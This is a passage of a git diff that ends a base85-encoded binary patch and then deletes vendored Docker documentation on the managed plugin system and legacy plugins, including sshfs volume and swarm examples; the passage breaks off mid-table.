zmHfca^&SHwV;+3_M793e?x-Cr@E;_owFF$y8n$rW)1OV&$NL-YB5OeASLE{Hn^N?0
zcIMyMS?|Gi{<RFIT^>~RJn*X|kzu{nAMa(}3O<u2W!F}zJ=q-<N`Z@=3t#&34%mqn
zEcSoH2nooXmC$`VuP<U?L$hALE)mq?1S&*7%t80Vgt?}^e$s1U*D{3Tf$R`3AHx{7
z1S3&HWmOvABVL~MEqh^_6A(S6Z4jMB3;ZUEW2`~AGp)dLm!*1AN(BWeJvD)mGqBLJ
zTq)*0n6+Jw7y?D|0et0ylgS+@%T5q2&<pKpcEZVw&HCHx5yI2~<55CvmhfXg@?9ig
z+9KS`_T!8>7!gZ7GBg9HD&JtisxStv`Dd8!dQl9`rsN5&O3m_6@dIS=V-ZCqsHRzL
zI4+OH1as28p*?y!`ZxCNe@;+)NtwW!ufv-C{K?P>f)8%Bf&(M>{$ZE!<u%azb90zi
zlM}C0D1e8#l3-c{9yu#y^&B@o@4)OD`)%Suho^TM`<a^yY(UiM!bPuyJMbSu@21=5
zG695IId>4gvIm)YL*SfxF@zLjk!YCmzwWO1hW|dJQqsGvBDJj0Br$J8<*sS<$3VYt
z>nxhV+{gBx_5M8_O^M=)Y|<GdT!uBjN<&g*q5aPEbPF_D4{**?w$oj|-nhm9lSEfC
zt^W4tD}dNp|F!#cCZyfZz|C|zfFVTIcXYAl;7^15z=(YJgp63hb+65@Om1Q25D5?(
z2SD(PF7^P_i-MY`ejX}Zb{6&_4HuCUjBSR&W8*QSz>?mD<Uqu<!c?PA5WFS&rW`gI
zl9KQ>>4L3n{;%m4CVEI;rbR;;U8WIb2MpGGKm`svn<(lz9HAna&&)F5qF30fz$O#j
zn|Fp7&sP`)<45yD?*^<5o$1!$qvT{zrjXuFtvdZErS5Qv4bjydLu%s~d{}vyk&2Va
z>5G<aK*#^?h>~uQq_i&Z7WPp}t)KRT@}nQ!04AMn-mWA4^tH}2zM-c`SSHWl(}(tC
zkxzzL&AK$GN5U^E7M`H&K$gmRYclJ1TxmCHd%gpvRe3K+a&IGv%cg2Gs3jUOmq$8?
z6E(D4TwiqQkxB~qH2HAHmicN9;CqP-L738=140r9p^qJ~Y<J+h4&ZVqwHd(B5!9cg
zb|{M0KgzQ5jOyzE7epd-MDwYbvWgKd4t)^Xk&45wmgi%9@4S}s=D#n9!go-B*Mx%L
z&dbUuQ@m7J{>KH6Oi#99P_?wzy8m62@xQkEkty-vLwEWF)5mR(XhK(am6cY_tXT)%
zs3~4<)(&-F>St-3=!D>m<xC3Dl6I&qc06jK42%VAQ0g5CgDGaNYWp`G_J94(SpE8z
zV@0lZX*wQ_sQ$=@Cv1rS1y`>FzN)I6^zknTi*`f}h;%@*Y|}qi75q#Xme?XJx7reH
zVUm*c$$%-6-!@GY?__QTYwimm(AseFkJ+T6&KO2&O*tIeL`1>2FnHd#27AJ6Ap3Vc
zQq#gH9iu<00QwnDGs+Y*8jIS+r@iN_t}*hD^bmt-D$kStBA3dnEaiPK@~f%azKQB6
zTFJRz&S%ErfBK6c22U<|PrF7q&(M&L3G%D;m*SnQ(%;h@w(}#n|7gk0B)*ASC`+ph
zDzm%+9i6}LDTBdNOfGSuolvYx>Tj>2^`-ZgO1fGiIqK@+`Pk=JvO|nPZEv8puDwBY
z>LtO6C!wq@&32qu<{{H^$L)asQQddHQ~AgLm&|0oDcdm$;n<<<B(lnubx=l<?X6>z
ztYh!&y;s>QTU!d*LK(^4gwONteO=$b;QPbp^MjwxIoEYN_v?PWo{xDLURdqz`QJXt
zp2?&xJ{*U)b^d)@Ix&7J#r1sFx2rJh{1~<z{qHahK+^b&$|<P-$PG?}-1xu#DvFPG
zuJZNCRiu~;)J0Qa>rZ?@2S<b9`W+1SKLIqMDG`>sV=W94gNDuZ_TzeHtdh>%myNm6
z!xbjH(9K19>kCiDJfxaM#j8YpLB9kz`%)PWksp8_6TqOI@6niS{)@_Ee<s+?%mb1W
z0eZxmdus4eH<`XD*1Z(Si@TMb*d7)a&VBC)bi1E%DArl1nQ4l6{Se<boUC1!%^>j{
zZcQnmwP{G(ZPBNw_4Y7(7V}TQ{|lc7uwsHN6#JxM^n_kJ4Ie;MDL@1xRP~c)ez)*8
zn*ny);j$D^wz!&b9ab^-mlDt>_YrsatJ|K)UVidtOY>N36E6ELh>mDL#5Rv;qYerv
zVbJw~Gw-m+6(~Swz;mT$oVCOq4c4oT3oMm;C-7+gguhteACfG_j>Mz@+_G_Lq(vj8
zEvJAfR1pp!Nunjh9Per<JKiL%F})zhPoW8h0UZz<T~xe4sQv|B$8RS{-OA5zHMZI-
z?%;!5affZdZGZi5jTWyOw+8t93bueO@cJCL7hEoDj>j_sc-PGv>hqqef>2#i3|wgf
z*b)*XU95KC-<YC)PVP@dtaL=cK~|_m0qVnEFe0VTWyuGo1stxdy7nW6r|VJO-HNZj
zZqhiyTy{Mj4w+(bIWD564#n``ekvmQ>3p~+;89oZbMh_lc*jfkglDJB`KlfFQIvK@
z%q+__?P5sCBq7J;=0d*!f;531Xl$vV;nh=XgYGry^6Nf-JS4sLtHNJ5BBUt|j5~s4
z$|U4xai5T~h|0FZ5~SGWgQ%{fmi5&cWejNNvAp`|rSba8wgvDLm03G=R+n*q1xN_|
zi|GKz1bpTW(7dbq_fo+G2F*x`h}ul`(kv!`CZxXv<$pn5*gRJnzPBq#&r13YkZM>;
zU)=cjNym$`EFY2|?QmwyuK-ueaeA`%Iv<WxY#4!d5ON#9sNcltUrWwC^!nsb6|q9J
z5>oxAQ&Fp(qkjqu=_gPMUy=++dtUUg`u;I*$=w}!?d!YT5m+bu5?qx_K>ubudLPXe
z=o5_$7Mh-^g7b9BMp^0YwJ=Uy{|NM&3Y@z;gXn^eb`}9GgFqj!+Y<=ruR8x85qb)`
zPCjt=0WaA;A{-tVJdFbm$9K^&Ioo(EjZo=l3k8T-r-2`VOp>}vUbxc$sCfAZ&x!41
zLd3xG_gHP|6YVm4-~f#fw4E7`3`Lq!8_#@va6t2|HZ7wwoqnH%uv3=iQ)=I3o7vT=
zRwEdfi!v_*;->AMhBF+k4`;f%pp&m&HN|}!tz*u|G`aVr4C=S82;%w2@`5v=9+SxW
z<SzF$ZXGEaPZ%33tFIa4Dv@=lKfF{{%qA5HPV$VFonfOxc`!J-AR-z0Sfh*e(qM6%
zOt1ok?J2g^F`8Tq{Z4U#qj1*oT@);609tX!rp>(T`3nJ-B7<drg|6!fF>>R0cWCTm
zz@|tqjje&?>#al>>21Pco_UXGGYA-c+DUxgF4JR6{3Y->#bBuOf}IC3_ChqE8PSCh
z6{!&vCwvOQ=KZg`yXynk$N}~rtf%|IG73v_h_)A{a<I@Z9hj8i&~~7N**-Upx6Q_#
z0P*V^R-v_>fE<?TIa}6~FX{CWvq%9h$uSA1;hF6a7v$RJ*&anWCPRTiPcWz8<+ANr
zM-;}75=q}vA*j#$bU^6oa~;+o*84kb8E0wVdP`@)9Cn?#Ohf?&_L9nJ2<a!eB0X=D
z@Hja%rq)IlX8MddcfEyRb!itgR!utpdtaa$k8`e@weI8@Ngi?Au!Y)vFr^LfA=dqs
zL5PR6?(Tz=AQ^SI4~3zNj_!#aHsR3lwB!m&-Yk$pY=0s(Rx52_h<#rUI_ua<AcaiT
zgd^f<wA*`5#(00#zowOzho0+iQf$UF2uAeM00PnySh75?o<xbwgX*$eE3xM$w|CT^
z7rY}9PhlJ(F)8xg8#cTlU`x~-#jHNir9(zTnooQ$4rbY9L1-bUY=V?bbN%K}CG7DP
zM-D(@(!RUkR2g?v`?gz~84PsA?*m;UvNQlJ4y}UgS@6@lW5b6MBWv{dyW4-Nsa1Ma
zxDPdj!~W5`*JafmGH|w_38Tc!=kLZ)U;}W;y+bt1M6jt{c>%tF!Q7k8tV;Rr9r5J&
z+GW+~-mx{%KN$!L@`Pd=;9^WZW44Jqbgpm~+xy?k0nW2HM_?wB=P?KD%!7q=w-f~V
z>%hr%JRDi9(<}uoZ`dCQf%}U`q1mjgURr6tO1Z~|mBWpAIC&fhn(@!LD=QxY+{jDs
zez-%|@%Tcw_XCGNLhql^pDPRclp%d|QB~(3@;)KU-o<;|N;&&o#N-@`Y8whj_m;ty
zYGgas2Uv(E2lJ~##J`@=^ZH&MKFWHXra+H&+mjl3^j!LuV3EHQ(Jq?sX4O2b{>$E7
zm^*_eReMx+50g*(XtHCdFW*Vl_7)ZAWm&C8!}@bEM_OH%mcc9a4xCmMW-L|HR7Q5F
z<X-{!rTkU%1pY#aChJ-R5N`^Tv52^^{5jcqhjZjoxGkovaCCeeN*Ak#ca=8Gv0u<0
zpDph&c!rw)pgv!GH#<P}<y{Y;W14^V(E5WU@4zG0@~5djRaN2Cv$*#4$Si>rly3%{
zgkR!PJLS>`6*}vv*_(MFkHk{p>+OituLG^<>S3bvhP*t_5pE?uznem<;Qy}Df2*>7
zEqvheaF`d#a1ClCSRA~#ecwI4z6#eSau?pO?u*!UDNB<3@G;!21)llk*8KT7QiJzm
zVSR$CkBlT*IS*bK3Ub`%T2_3e6tSb#-0eI*mv6l~(a1nFd>}<)ibd3oZv#>XTzwx~
zwi^n~52Ky>t_u&#3i0}-pv>G!{?<o61ua^QnoaTr1x>qOzlmV;%-cz6rV7hO3hZnQ
z!xQsdy6QK`({ljQaLZLC*LCFh5O(}7hn(#CR`cql4$ZI`?=d81w2^$5e@1n&?52=g
z=m2VrEVqM28oRhu2NbcbohcndJ8+nH>IvQvJJrjG{S*?onOvL&ED;|s<~czwBOQMu
zsp)<5AJ2+i=wLo~txKU7beb@ez<CNrjws-DrNQE{oom44E%B4V4sP1HKD(;2{!$P8
z)0(EPq#}68rDm)HP4Pa2ilatSx<GP*fI{+jp~CH+DGsxMVtO23mZQ+aUnjLp264~|
zxBNixfI{)ZM{4CXWr}b&YBjE|O$t6CT9W*bo%?F9MhS9VL!ORPJTw~F5?cT^a`+fO
zmodJhwY6%E3@K=Q!7bz~`n9NmsG1Nm`^<iBYY@_9gT>e8BQKoGD79VP(-~6OPt;WJ
zPr~?y%B-~$iy9`{m`$KQN;od(uxh&72XyX)*5wwRWWzWksU=Ex{LbEeLha(@U+wp4
zciVv=aX?pLw8%ufe@l1kk>J$4ND5{!qJGi_tGTLDbdV2u2=iyybgKW#K}xYyVf{_d
z5oOt6;qERQ@Z4cPl4Y(0(#>6{Nio4VpN!d6+H$?}W{<Zw?;lT_>p4HY-+iCsg23-h
z&@6uS`(<Y~R_cy*^?Z@UB|2(i!Y1fa8^5u7%7e{*AS;Ee-I|dNIEa@4xyRD{CY*a2
z9oFL+K8LpUB7OtqUwy1gQS#R}>La0KkVaH#NRUt%&xnvu{4RU2+z5`&{{obsF|bb=
z3nc_bG&Rs~q$|<A!88$?mFz=}<)16KdNZ}=b}T<oJk#6B^Edl?Qc*aP*v%{9&hnT+
zgjsFvM>8m~-etE+C*k176>Zd!=5li@NKu;qB$Yq<&QJgRTC!G9E$gtMU`~4t^|k47
zarNL5ephp;KV94x1q`G;cL!M+{ciCdQnek21{*l<{(Sldos*7f57_Pf5K(`0HjE^7
zwSzo$!yFu-h*IVr{1VTsY^I5~;>VPTfl|jC8Ug9~p7$g`7Y*&ihR6A$R{aO51fo5r
zzMo_Bi0Ny^Q#Es8ZBGuNK8qjQ^psP_6H_H_58Z9pQz!z?*8%-r7w9@&$m7Ae75C(T
zu;hq^W3N@dh;`Sr6$&6q6ho=80(vp*w{(C49s*2aQsS^n)wnj)DT5wFIB@g~GIT(W
zCcBF05$vC6pSO+c{|(21qiaE~E50C_m3SR&p7)fH_U70Dkb!7n2us&g4vb3{Aq7hr
z+PEQW&vxdh1gX&oi=C(wJQ~(3GceB&jRQ~3vh$qHC9l&>Fy!moxOn}u1xrvL`cHFC
zGAg8vv+NzBQscM&wzLR7?AyB)107xCxVXMK;2GR9ZyUIrf*X<hx4fd++f?z&sT(+H
z9}Ibg`-W@3MD=Z?z+<V#X{y{vJgF^ISmJo5@r=;%*jI5sw=)!{6PY~3)XL1jZd5Es
zSf6X-{{tQ_n+k3_aNL$NO=jw9Fr{V4>M5v5$v@@JAj$K0(b^WDx*A6(#xvTZ!}PbI
zsvzr@!Nb4-pAKb?&Z;19C-d5fB^wd@$LBAEd*X70W;3Ap(n({8<0wkxq{`6J70v!P
z&5aT!#!zt7#imRLi{<woO6AE16847n30|Spv%{Hx2)*^!ik*qSKE&{tE6@qGt8eim
zMC`Uf?@gYu*CBHvLWIg<pctr&ZGWOa66u-Iq+4KGj2pub_<JR_l8Qzr2Bw{f!d^uz
zMv3c}uNX{p6_F$sTP@#~7)(9xYotY*EAw7N$udKaK(XFgtKV^QfAjtOeB9?0`OogM
zE)@J^$Q5Bc1U?BNu~ERf(>-?8OZlt*w}U(3fAx$04~|(l+CFKhNaOv;#QyHOY`yF6
zXiJjF@d7&ctP68U@Rt9Y@_{;eex^{1jD+PsDneOK5qu3~|Nngr&uIN23q>kpTm=}a
z>Z-oPMJq@)YeAK~Nev>mJ%Iw_+Y%SWa^5NS(B1pk(}@@`{H*a{vyFxEP8E_@(nMLM
z)A+GFDiW_<%>Pn6DF0|`KMUXx9hJ9261pWVa0!W4(z%K4Fst(ezxeXkH&C3BIX(4r
zN#Pl=;Ud2g;3jSTiHXOkt_=T1T0+OE#vgUo4hrZiMgShdF8~nFcbJ9)_#JH$C%`ki
zl_W7cJp@qzlAqdSg&<Zu$m&@aqSqjl%r9$Z3-2~T;y17tU>Tg>M6(UM{s17n?fL`2
zQ`z?KuL+LZiESx_$iskC!!8WK7|q<r=>b(0NSp)7^PRth=7Z>isHy2!r7XCVJD{Ao
zHA%3@c#VWD%Oo`U9Aj-qs<N%XDrO}w3C<3?py@jMRHO#JFz5u29C5y#05><l1RdOH
zpb6svO4$ADVEdxUcX!mf$v%1kd>U*p1IK{gx9p6P9h?rScNaDPFu+(3Stb?O0WX97
z0NXtQ(|aQf(vdIXokMeA@hgh@1I=C1$Kt8>Z3Z^UtMIm8(6O(LSpS~%%bvDi0Zr;w
zbv54H68G*dg>JA%Ukf6}ARGV;U_#T;YO^jdrEamIp`mvab%4tr1kHO8$WmRny*glQ
zuSHT^y727}=G+P&got|i;oe#$yr}^3Yah4fd&5AA7z&0U_gf3tOU!;uH2vbN9OBp9
zQfg9qPR?BN-maoG-{GAptf};2*jU{r5rH!oVlXDiPaTv1e*~AMj))pR!I=WlON}E>
z)$#b_w_KSzfQR&9f$BpWeAPRI88LC+2T4X_FA(OyQUs)z8@^Hk9YIAJ$xvm!PZB7F
z);klo-y`>ch*DS2kTUG)=_y7!*^gLdybKD1uvuilV=arQYwrPu<V`z;9sVkKEfCMh
zBT#|P^TB*4GkGZ{w9<W$;9y$TVWJ%&2}%GnT~`<EsWoS@X^g&1o0~4vuY$sZNiQ1s
z3Z(S>xGIPmDe*&O-3oOWl!pL4ZQqngo|(9JU_>ruvq9PBv5}L2A8(1Y`oSQzeUmoK
z3C_aAQ?Oi=3tN3CT9?ZN3JW2<4*_-5$j%~E%+bLeMyHiKG$cqsHqm(_pUykqfu$2n
z^!4v#AbO@-`$*S2V!vns91Z-ZaOaIbrb%k^q8yCDcjKu#n!SkAf+lxxS`;B%jY%tZ
z=$$n@4<&GfA09%k<BRt^2ziOJrWq5obFh^8e9d5i3K%zh4m)?thK7cTh>Rf*F+3l)
z*5)R(pK7!?9YMpH4j{Q92tt(GaNle?{Wi7JqOcdV!SVWCuZ3_Nd)Q~3jYaI;N3muR
ze7Kj@nA<03d3rh{Bh(%lQ1V>M;}*v8$c7Q}Dg{0^#AIJst?&POG*MwYabr!KaV@Q|
zVIhOH-}}?T#GaH(#)8Pyj|U}3M$K7@^K=Jk=t^pTvoJY(`*IIY&wmyc7A$;yGZpNi
zWrLlP_%1Q+Ovm9NHYPT9Gxs=WChS{eW25AGmxm7@7GGUwlco+0Nlj%m7fvb47)@*_
zE-TBsYbU`}5RFps*{>d7>HO&&IyGe)laYa@ymE_p<;EoDF?$(~60NGMOB-~wZ@Ts<
zFVnvN{d?^pR9?uAKgug5E{@}a)vK|o(NUF$&uDiZ_l?+$Gm{f7=_DNU81P*jn4T7B
zF|Cxiaf8D+GAb(Qqg5`8hklt}sh>UH(9n>Don5%Y(*3)4v!)oAencj-k`60+W+o;U
zJpVv7cKn3-sg&7{BO^UMn{-M_%7h69y)RCAK1k8WM`p-w<?}1j^n6R5?0ACE_BF*b
zsboyktE*_quHj+5F`A2)F4<};$V7;@XRa3B;xoN5H9gJqZ$oQqIkU#ki3#J4%}s@e
zk4^a;e^CyyiF<f>aR2dnZD3+TyS24t;q0u%#Kc6*G1)$|wG}t?MNCXgw>4_#)JTCV
zJjSQar1T%lnSHi)?qQM7R(Yv3ipK$M1_2WsX;+v;r-JM1t~oh7D|lqfuH$<B?FWC&
z?Gd^uU4P0{NjvQ;Zr19?clGM*jO$Pr+0*$&>viMrOop?yq{o*Jp5Kep4{aAv%Brru
zx9=t6j6*&AzOcBcTvk~bUQlqw%}RDsQ}<6HWz@;+tcAZe-?f^~PKCp>PWWbGpPvlt
z>+6>shKG|nucChaURi;CjfDL(E-H$2yNiUfkeOpr;&QfZMj!PB!bastQgKa9%}2}{
z%zR3Rjnn_?r|qw<t@X^!<&F{HUy9bjxh5qh#;)}D_x~~|UwM>IiT8{b6H46q{d<;;
ztu0$$FZnsH+i5;#W@ba?j%iqnJZ*=^W!GBWaI2NUj2h|5;qD*TJ9s1|Q>MyoOq?c5
z<qZv^iIwqv`0<jGk|6Ie;NN3W&8?!MqB!`yDRY(R3*n|E-^Su?bWKZ(adBy>c0fm#
zGZtGCpOC<_va*u*+(m(mj7+iUsfWj1Ch}lmQBlPee>uNRSJWpISBMwAGWQ#8h9yGD
z;+&j-j3B0;o12@LHp#~150@4fv%L6~g-{|+Ed9!|<K%c3!u#g#J-)^`sUW)<k<6R1
zwsk;L7WZvgtcJN!=SSq^lX|=~_~*Ind+TgnaHOQ9ie4K>$BNjL^mJWeVPTyc(VpE>
z&CShA$8x?kN%8T~>1u5xK?+i2J<8T)jo$_bxh*X%OUUEz5e*pKuCbfum!4pcAs!`D
zljrPAi?JqBA=#{VH^*^KQ@U;@DSqGM@QWZ%y+V5J-@#k&HFsUEr+1@=WH?xk>+9>o
z-v4ATd?1_>a{1j468QZMLIQgHNLvi%J88@VEcV4USqa6*0U{zIB_!CUfu+^eNP}$D
zmLC&d9q)}xHEX|rbL*8Ryph2~X{f7v+kX4nU+23(m(7a%Ha~CWY%D1$d0ttF4?fAo
zM9$mJ#L3(|sev=DGg+qVnC)(ntHT>DDlJttG&0Jy7B-?UGr$o%->*6odqE~k&O%a&
zBfWaQVu5ah32wSi{kCIsTiX>i|M1brdhNXgMzov0zwdOmH$*1Bj8l|jM^Wt)QMK>U
z=<DfmI~-7G2+YSv3*cw>EV-7fbai#n_)Jes=qyv$qFivHO`FbB)MrEGI@!-8@;UeK
z-^Abla@yPbeBDE;bH$yD@5)%Hs$R)OGQ&hzP@H%qerHBX_QyUfE*32=FaI+-I=cNW
z7>mVHV|IJB<Fj=vaStd${r+BqG7A3zx0wG$BMn`+B4j<{sP-wGgT(o&`xQChN1M*5
M+|p32P{0KI54=tH{r~^~

diff --git a/vendor/github.com/docker/docker/docs/extend/index.md b/vendor/github.com/docker/docker/docs/extend/index.md
deleted file mode 100644
index 1410b205e5..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/index.md
+++ /dev/null
@@ -1,222 +0,0 @@
----
-description: Develop and use a plugin with the managed plugin system
-keywords: "API, Usage, plugins, documentation, developer"
-title: Managed plugin system
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Docker Engine managed plugin system
-
-* [Installing and using a plugin](index.md#installing-and-using-a-plugin)
-* [Developing a plugin](index.md#developing-a-plugin)
-
-Docker Engine's plugins system allows you to install, start, stop, and remove
-plugins using Docker Engine. This mechanism is currently only available for
-volume drivers, but more plugin driver types will be available in future releases.
-
-For information about the legacy plugin system available in Docker Engine 1.12
-and earlier, see [Understand legacy Docker Engine plugins](legacy_plugins.md).
-
-> **Note**: Docker Engine managed plugins are currently not supported
-on Windows daemons.
-
-## Installing and using a plugin
-
-Plugins are distributed as Docker images and can be hosted on Docker Hub or on
-a private registry.
-
-To install a plugin, use the `docker plugin install` command, which pulls the
-plugin from Docker hub or your private registry, prompts you to grant
-permissions or capabilities if necessary, and enables the plugin.
-
-To check the status of installed plugins, use the `docker plugin ls` command.
-Plugins that start successfully are listed as enabled in the output.
-
-After a plugin is installed, you can use it as an option for another Docker
-operation, such as creating a volume.
-
-In the following example, you install the `sshfs` plugin, verify that it is
-enabled, and use it to create a volume.
-
-1.  Install the `sshfs` plugin.
-
-    ```bash
-    $ docker plugin install vieux/sshfs
-
-    Plugin "vieux/sshfs" is requesting the following privileges:
-    - network: [host]
-    - capabilities: [CAP_SYS_ADMIN]
-    Do you grant the above permissions? [y/N] y
-
-    vieux/sshfs
-    ```
-
-    The plugin requests 2 privileges:
-    - It needs access to the `host` network.
-    - It needs the `CAP_SYS_ADMIN` capability, which allows the plugin to run
-    the `mount` command.
-
-2.  Check that the plugin is enabled in the output of `docker plugin ls`.
-
-    ```bash
-    $ docker plugin ls
-
-    ID                    NAME                  TAG                 DESCRIPTION                   ENABLED
-    69553ca1d789          vieux/sshfs           latest              the `sshfs` plugin            true
-    ```
-
-3.  Create a volume using the plugin.
-    This example mounts the `/remote` directory on host `1.2.3.4` into a
-    volume named `sshvolume`. This volume can now be mounted into containers.
-
-    ```bash
-    $ docker volume create \
-      -d vieux/sshfs \
-      --name sshvolume \
-      -o sshcmd=user@1.2.3.4:/remote
-
-    sshvolume
-    ```
-4.  Verify that the volume was created successfully.
-
-    ```bash
-    $ docker volume ls
-
-    DRIVER              NAME
-    vieux/sshfs         sshvolume
-    ```
-
-5.  Start a container that uses the volume `sshvolume`.
-
-    ```bash
-    $ docker run -v sshvolume:/data busybox ls /data
-
-    <content of /remote on machine 1.2.3.4>
-    ```
-
-To disable a plugin, use the `docker plugin disable` command. To completely
-remove it, use the `docker plugin remove` command. For other available
-commands and options, see the
-[command line reference](../reference/commandline/index.md).
-
-## Service creation using plugins
-
-In swarm mode, it is possible to create a service that allows for attaching
-to networks or mounting volumes. Swarm schedules services based on plugin availability
-on a node. In this example, a volume plugin is installed on a swarm worker and a volume 
-is created using the plugin. In the manager, a service is created with the relevant
-mount options. It can be observed that the service is scheduled to run on the worker
-node with the said volume plugin and volume. 
-
-In the following example, node1 is the manager and node2 is the worker.
-
-1.  Prepare manager. In node 1:
-
-    ```bash
-    $ docker swarm init
-    Swarm initialized: current node (dxn1zf6l61qsb1josjja83ngz) is now a manager.
-    ```
-
-2. Join swarm, install plugin and create volume on worker. In node 2:
-
-    ```bash
-    $ docker swarm join \
-    --token SWMTKN-1-49nj1cmql0jkz5s954yi3oex3nedyz0fb0xx14ie39trti4wxv-8vxv8rssmk743ojnwacrr2e7c \
-    192.168.99.100:2377
-    ```
-
-    ```bash
-    $ docker plugin install tiborvass/sample-volume-plugin
-    latest: Pulling from tiborvass/sample-volume-plugin
-    eb9c16fbdc53: Download complete
-    Digest: sha256:00b42de88f3a3e0342e7b35fa62394b0a9ceb54d37f4c50be5d3167899994639
-    Status: Downloaded newer image for tiborvass/sample-volume-plugin:latest
-    Installed plugin tiborvass/sample-volume-plugin
-    ```
-	
-    ```bash
-    $ docker volume create -d tiborvass/sample-volume-plugin --name pluginVol
-    ```
-
-3. Create a service using the plugin and volume. In node1:
-
-    ```bash
-    $ docker service create --name my-service --mount type=volume,volume-driver=tiborvass/sample-volume-plugin,source=pluginVol,destination=/tmp busybox top
-
-    $ docker service ls
-    z1sj8bb8jnfn  my-service   replicated  1/1       busybox:latest 
-    ```
-    docker service ls shows service 1 instance of service running.
-
-4. Observe the task getting scheduled in node 2:
-
-    ```bash
-    $ docker ps --format '{{.ID}}\t {{.Status}} {{.Names}} {{.Command}}' 
-    83fc1e842599     Up 2 days my-service.1.9jn59qzn7nbc3m0zt1hij12xs "top"
-    ```
-
-## Developing a plugin
-
-#### The rootfs directory
-The `rootfs` directory represents the root filesystem of the plugin. In this
-example, it was created from a Dockerfile:
-
->**Note:** The `/run/docker/plugins` directory is mandatory inside of the
-plugin's filesystem for docker to communicate with the plugin.
-
-```bash
-$ git clone https://github.com/vieux/docker-volume-sshfs
-$ cd docker-volume-sshfs
-$ docker build -t rootfsimage .
-$ id=$(docker create rootfsimage true) # id was cd851ce43a403 when the image was created
-$ sudo mkdir -p myplugin/rootfs
-$ sudo docker export "$id" | sudo tar -x -C myplugin/rootfs
-$ docker rm -vf "$id"
-$ docker rmi rootfsimage
-```
-
-#### The config.json file
-
-The `config.json` file describes the plugin. See the [plugins config reference](config.md).
-
-Consider the following `config.json` file.
-
-```json
-{
-	"description": "sshFS plugin for Docker",
-	"documentation": "https://docs.docker.com/engine/extend/plugins/",
-	"entrypoint": ["/go/bin/docker-volume-sshfs"],
-	"network": {
-		   "type": "host"
-		   },
-	"interface" : {
-		   "types": ["docker.volumedriver/1.0"],
-		   "socket": "sshfs.sock"
-	},
-	"capabilities": ["CAP_SYS_ADMIN"]
-}
-```
-
-This plugin is a volume driver. It requires a `host` network and the
-`CAP_SYS_ADMIN` capability. It depends upon the `/go/bin/docker-volume-sshfs`
-entrypoint and uses the `/run/docker/plugins/sshfs.sock` socket to communicate
-with Docker Engine. This plugin has no runtime parameters.
-
-#### Creating the plugin
-
-A new plugin can be created by running
-`docker plugin create <plugin-name> ./path/to/plugin/data` where the plugin
-data contains a plugin configuration file `config.json` and a root filesystem
-in subdirectory `rootfs`. 
-
-After that the plugin `<plugin-name>` will show up in `docker plugin ls`.
-Plugins can be pushed to remote registries with
-`docker plugin push <plugin-name>`.
diff --git a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md
deleted file mode 100644
index 6ac914e366..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md
+++ /dev/null
@@ -1,98 +0,0 @@
----
-redirect_from:
-- "/engine/extend/plugins/"
-title: "Use Docker Engine plugins"
-description: "How to add additional functionality to Docker with plugins extensions"
-keywords: "Examples, Usage, plugins, docker, documentation, user guide"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Use Docker Engine plugins
-
-This document describes the Docker Engine plugins generally available in Docker
-Engine. To view information on plugins managed by Docker,
-refer to [Docker Engine plugin system](index.md).
-
-You can extend the capabilities of the Docker Engine by loading third-party
-plugins. This page explains the types of plugins and provides links to several
-volume and network plugins for Docker.
-
-## Types of plugins
-
-Plugins extend Docker's functionality. They come in specific types.  For
-example, a [volume plugin](plugins_volume.md) might enable Docker
-volumes to persist across multiple Docker hosts and a
-[network plugin](plugins_network.md) might provide network plumbing.
-
-Currently Docker supports authorization, volume and network driver plugins. In the future it
-will support additional plugin types.
-
-## Installing a plugin
-
-Follow the instructions in the plugin's documentation.
-
-## Finding a plugin
-
-The sections below provide an inexhaustive overview of available plugins.
-
-<style>
-#DocumentationText  tr td:first-child { white-space: nowrap;}
-</style>
-
-### Network plugins
-
-Plugin                                                                              | Description
------------------------------------------------------------------------------------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-[Contiv Networking](https://github.com/contiv/netplugin)                            | An open source network plugin to provide infrastructure and security policies for a multi-tenant micro services deployment, while providing an integration to physical network for non-container workload. Contiv Networking implements the remote driver and IPAM APIs available in Docker 1.9 onwards.
-[Kuryr Network Plugin](https://github.com/openstack/kuryr)                          | A network plugin is developed as part of the OpenStack Kuryr project and implements the Docker networking (libnetwork) remote driver API by utilizing Neutron, the OpenStack networking service. It includes an IPAM driver as well.
-[Weave Network Plugin](https://www.weave.works/docs/net/latest/introducing-weave/)    | A network plugin that creates a virtual network that connects your Docker containers - across multiple hosts or clouds and enables automatic discovery of applications. Weave networks are resilient, partition tolerant, secure and work in partially connected networks, and other adverse environments - all configured with delightful simplicity.
-
-### Volume plugins
-
-Plugin                                                                              | Description
------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-[Azure File Storage plugin](https://github.com/Azure/azurefile-dockervolumedriver)  | Lets you mount Microsoft [Azure File Storage](https://azure.microsoft.com/blog/azure-file-storage-now-generally-available/) shares to Docker containers as volumes using the SMB 3.0 protocol. [Learn more](https://azure.microsoft.com/blog/persistent-docker-volumes-with-azure-file-storage/).
-[Blockbridge plugin](https://github.com/blockbridge/blockbridge-docker-volume)      | A volume plugin that provides access to an extensible set of container-based persistent storage options. It supports single and multi-host Docker environments with features that include tenant isolation, automated provisioning, encryption, secure deletion, snapshots and QoS.
-[Contiv Volume Plugin](https://github.com/contiv/volplugin)                         | An open source volume plugin that provides multi-tenant, persistent, distributed storage with intent based consumption. It has support for Ceph and NFS.
-[Convoy plugin](https://github.com/rancher/convoy)                                  | A volume plugin for a variety of storage back-ends including device mapper and NFS. It's a simple standalone executable written in Go and provides the framework to support vendor-specific extensions such as snapshots, backups and restore.
-[DRBD plugin](https://www.drbd.org/en/supported-projects/docker)                    | A volume plugin that provides highly available storage replicated by [DRBD](https://www.drbd.org). Data written to the docker volume is replicated in a cluster of DRBD nodes.
